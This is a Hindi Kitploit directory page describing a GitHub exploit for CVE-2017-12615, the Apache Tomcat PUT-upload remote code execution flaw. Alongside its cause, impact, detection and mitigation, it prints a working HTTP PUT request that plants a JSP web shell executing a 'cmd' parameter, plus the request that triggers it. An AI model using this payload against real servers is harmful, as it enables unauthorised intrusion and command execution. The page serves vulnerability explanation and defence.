Skip to content
KitploitKITPLOIT
उपकरणब्लॉग
जमा करें
उपकरणब्लॉग
जमा करें

हैकिंग, पेनटेस्ट और साइबर सुरक्षा उपकरण आपके सुरक्षा शस्त्रागार के लिए!

Kitploit हैकिंग, साइबर सुरक्षा और पेंटेस्टिंग टूल्स की एक निर्देशिका है। कमजोरियों को खोजने, सिस्टम का विश्लेषण करने, परीक्षण को स्वचालित करने और अपनी सुरक्षा को मजबूत करने के लिए नवीनतम प्रोजेक्ट अपडेट खोजें।

··फ़ीड·संपर्क·गोपनीयता·© 2026 Kitploit

टूल निर्देशिका

श्रेणियाँ

सभी श्रेणियाँ देखें
Loading categories
उपकरण/GitHubGitHub/k3ystr0k3r/cve-2017-12615
पेलोड जनरेशनभेद्यता विश्लेषणकोड विश्लेषणशोषणवेब एप्लिकेशन शोषणपेनिट्रेशन टेस्टिंगलर्निंग और शिक्षा
GitHubk3ystr0k3r/cve-2017-12615

CVE-2017-12615

CVE-2017-12615 - Apache Tomcat रिमोट कोड निष्पादन (RCE)

रिपॉजिटरी देखें
12 महीने पहलेअभी तक समीक्षित नहीं

सबसे लोकप्रिय

सभी देखें →

हमारे समुदाय द्वारा सबसे अधिक उपयोग किए जाने वाले उपकरण खोजें।

सभी उपकरण खोजें

हमारे उपकरणों का संग्रह ब्राउज़ करें

सभी उपकरण देखें →
साझा करें

CVE-2017-12615 - Apache Tomcat दूरस्थ कोड निष्पादन (RCE)

CVE-2017-12615 एक दूरस्थ कोड निष्पादन (RCE) भेद्यता है जो Apache Tomcat 7.0.0 से 7.0.79 को प्रभावित करती है जो Microsoft Windows पर चल रहा है जब HTTP PUT अनुरोध सक्षम होते हैं।

यह भेद्यता इसलिए मौजूद है क्योंकि Tomcat अपलोड की गई JSP फ़ाइलों को गलत तरीके से संभालता है जब DefaultServlet को readonly पैरामीटर के साथ false पर सेट किया जाता है। इन परिस्थितियों में, एक अप्रमाणित हमलावर एक दुर्भावनापूर्ण JSP फ़ाइल को सीधे वेब सर्वर पर अपलोड कर सकता है और केवल अपलोड की गई फ़ाइल का अनुरोध करके मनमाना Java कोड निष्पादित कर सकता है।

यह भेद्यता सबसे प्रसिद्ध Tomcat RCE समस्याओं में से एक बन गई क्योंकि गलत कॉन्फ़िगर किए गए सर्वरों के खिलाफ इसे हथियार बनाना कितना आसान था।


प्रभावित संस्करण

  • Apache Tomcat 7.0.0 - 7.0.79
  • Microsoft Windows स्थापनाएँ
  • HTTP PUT विधि सक्षम
  • DefaultServlet पर readonly="false" कॉन्फ़िगर किया गया

गंभीरता

मीट्रिकमान
CVECVE-2017-12615
CVSS v38.1 (उच्च)
आक्रमण वेक्टरनेटवर्क
आवश्यक विशेषाधिकारकोई नहीं
उपयोगकर्ता सहभागिताकोई नहीं
प्रभावदूरस्थ कोड निष्पादन

मूल कारण

सामान्यतः, Apache Tomcat उपयोगकर्ताओं को निष्पादन योग्य JSP फ़ाइलें अपलोड करने से रोकता है।

हालाँकि, जब:

  • HTTP PUT अनुरोध सक्षम होते हैं
  • DefaultServlet लिखने योग्य होता है (readonly=false)
  • Tomcat Windows पर चल रहा हो

एक हमलावर वेब रूट में सीधे एक JSP फ़ाइल अपलोड कर सकता है।

एक बार अपलोड होने के बाद, उस JSP का अनुरोध करने से Tomcat इसे संकलित और निष्पादित करता है, जिससे Tomcat सेवा के विशेषाधिकारों के तहत मनमाना Java कोड निष्पादन संभव हो जाता है।


आक्रमण प्रवाह

root@kitploit:~
Attacker
    │
    │ HTTP PUT
    ▼
Uploads malicious JSP shell
    │
    ▼
Tomcat stores file
    │
    │ HTTP GET
    ▼
Requests uploaded JSP
    │
    ▼
Tomcat compiles JSP
    │
    ▼
Java code executes
    │
    ▼
Remote Code Execution

शोषण प्रक्रिया

एक सामान्य हमला इन चरणों का अनुसरण करता है:

  1. एक कमजोर Tomcat उदाहरण की पहचान करें।
  2. सत्यापित करें कि HTTP PUT अनुरोधों की अनुमति है।
  3. एक दुर्भावनापूर्ण .jsp वेब शेल अपलोड करें।
  4. अपलोड की गई JSP का अनुरोध करें।
  5. मनमाने सिस्टम कमांड निष्पादित करें।
  6. एक रिवर्स शेल स्थापित करें या अतिरिक्त पेलोड तैनात करें।

यदि सर्वर कमजोर है तो कोई प्रमाणीकरण आवश्यक नहीं है।


उदाहरण अनुरोध

उदाहरण HTTP PUT अनुरोध:

root@kitploit:~
PUT /shell.jsp HTTP/1.1
Host: victim.com
Content-Type: application/octet-stream

<%@ page import="java.io.*" %>
<%
Runtime.getRuntime().exec(request.getParameter("cmd"));
%>

यदि सफल होता है, तो सर्वर इस प्रकार प्रतिक्रिया देता है:

root@kitploit:~
HTTP/1.1 201 Created

पेलोड को तब विज़िट करके निष्पादित किया जा सकता है:

root@kitploit:~
http://victim.com/shell.jsp?cmd=whoami

उदाहरण पहचान

कमजोर सिस्टम की पहचान करने का एक सरल तरीका है एक हानिरहित परीक्षण JSP अपलोड करने का प्रयास करना:

root@kitploit:~
PUT /test.jsp

संभावित प्रतिक्रियाएँ शामिल हैं:

root@kitploit:~
201 Created

या

root@kitploit:~
204 No Content

यदि अपलोड की गई फ़ाइल बाद में HTTP पर प्राप्त की जा सकती है, तो सर्वर संभवतः कमजोर है।


प्रभाव

सफल शोषण एक हमलावर को निम्नलिखित की अनुमति देता है:

  • मनमाने ऑपरेटिंग सिस्टम कमांड निष्पादित करें
  • स्थायी वेब शेल अपलोड करें
  • रिवर्स शेल प्राप्त करें
  • मैलवेयर या रैनसमवेयर तैनात करें
  • संवेदनशील जानकारी चुराएँ
  • आंतरिक नेटवर्क में गहराई तक पहुँचें
  • प्रभावित Tomcat सर्वर से पूरी तरह समझौता करें

समझौता के संकेत

सुरक्षा टीमों को निम्नलिखित की जाँच करनी चाहिए:

  • अप्रत्याशित HTTP PUT अनुरोध
  • नवनिर्मित .jsp फ़ाइलें
  • अज्ञात वेब शेल
  • Tomcat द्वारा उत्पन्न संदिग्ध चाइल्ड प्रक्रियाएँ
  • रिवर्स शेल नेटवर्क कनेक्शन
  • Tomcat वेब रूट के भीतर असामान्य गतिविधि

निवारण

अनुशंसित निवारण उपायों में शामिल हैं:

  • Apache Tomcat को पैच किए गए रिलीज़ में अपग्रेड करें।
  • HTTP PUT को तब तक अक्षम करें जब तक पूरी तरह आवश्यक न हो।
  • सुनिश्चित करें कि DefaultServlet readonly="true" का उपयोग करता है।
  • अपलोड अनुमतियों को प्रतिबंधित करें।
  • अप्रत्याशित JSP फ़ाइल निर्माण की निगरानी करें।
  • एक वेब एप्लिकेशन फ़ायरवॉल (WAF) तैनात करें।
  • संदिग्ध PUT अनुरोधों के लिए नियमित रूप से Tomcat एक्सेस लॉग की समीक्षा करें।

तकनीकी सारांश

गुणमान
भेद्यतामनमाना JSP अपलोड
CWECWE-434 - खतरनाक प्रकार वाली फ़ाइल का अप्रतिबंधित अपलोड
प्रमाणीकरण आवश्यकनहीं
शोषण जटिलताकमजोर कॉन्फ़िगरेशन पर कम
परिणामदूरस्थ कोड निष्पादन
प्लेटफ़ॉर्मविंडोज़
सेवाApache Tomcat

संदर्भ

  • NIST राष्ट्रीय भेद्यता डेटाबेस (NVD)
  • Apache Tomcat सुरक्षा सलाहकार
  • CVE रिकॉर्ड: CVE-2017-12615

अस्वीकरण

यह रिपॉजिटरी केवल शैक्षिक उद्देश्यों, रक्षात्मक सुरक्षा अनुसंधान और अधिकृत पेनिट्रेशन परीक्षण के लिए है। इस जानकारी का उपयोग स्पष्ट अनुमति के बिना सिस्टम के विरुद्ध न करें।

टूल डाउनलोड करें